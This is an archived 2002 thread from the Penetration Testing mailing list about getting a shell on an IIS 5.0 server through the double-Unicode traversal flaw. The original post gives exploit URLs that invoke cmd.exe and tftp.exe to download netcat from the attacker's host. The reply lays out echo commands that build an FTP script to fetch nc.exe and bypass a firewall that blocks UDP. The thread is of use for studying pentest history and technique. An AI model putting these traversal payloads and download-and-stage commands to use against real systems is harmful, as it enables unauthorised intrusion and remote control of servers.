Penetration Testing mailing list archives

RE: Can't get a shell

From: "Jeremy Junginger" <jjunginger () interactcommerce com>
Date: Thu, 11 Jul 2002 10:06:25 -0700

Use ftp with a script if ftp is allowed outbound.  Example:

Open x.x.x.x >ftpscript
Echo user >>ftpscript
Echo password >>ftpscript
Echo get nc.exe >>ftpscript
Echo quit >>ftpscript

And then at the prompt, fire up:

Ftp -s:ftpscript

And that should get you what you need, right??

-Jeremy

-----Original Message-----
From: Gaziel, Avishay [mailto:agaziel () kpmg com] 
Sent: Tuesday, July 09, 2002 9:33 AM
To: PEN-TEST () securityfocus com
Subject: Can't get a shell


Hi All,
Situation:
An  IIS5.0 vulnerable to unicode.("double Unicode" i.e. ..%255c.. etc.)
IIS sitting behind a firewall.
Problem:
host/scripts/..%255c.........../winnt/system32/cmd.exe?/tftp+-i+myserver
+get
+nc.exe doesn't work
I keep getting (from my pumpkin tftp server) an error message saying
that there's something wrong with the variables. another strange thing
is that even if I don't get the error message the tftp session will not
start and will timeout, if I deny access I keep getting access requests
from the IIS.(Pumpkin is configured to prompt whenever a download/upload
starts) What have I tried to do?  Use
host/scripts/..%255c.........../winnt/system32/tftp.exe+-i+myserver+get+
nc.e
xe instead of the above mentioned...doesn't   work as well.
What do I think is wrong?
The FW is blocking all udp traffic out.
What do I need?
1. Suggestions
2.Workarounds
Avishay 





************************************************************************
*****
The information in this email is confidential and may be legally
privileged. It is intended solely for the addressee. Access to this
email by anyone else is unauthorized. 

If you are not the intended recipient, any disclosure, copying,
distribution or any action taken or omitted to be taken in reliance on
it, is prohibited and may be unlawful. When addressed to our clients any
opinions or advice contained in this email are subject to the terms and
conditions expressed in
the governing KPMG client engagement letter.         
************************************************************************
*****

------------------------------------------------------------------------
----
This list is provided by the SecurityFocus Security Intelligence Alert
(SIA) Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please
see: https://alerts.securityfocus.com/

Attachment: smime.p7s
Description:

Current thread:

Can't get a shell Gaziel, Avishay (Jul 11)
- RE: Can't get a shell Coral J. Cook (Jul 11)
- <Possible follow-ups>
- RE: Can't get a shell Rico Valdez (Jul 11)
- RE: Can't get a shell Jeremy Junginger (Jul 11)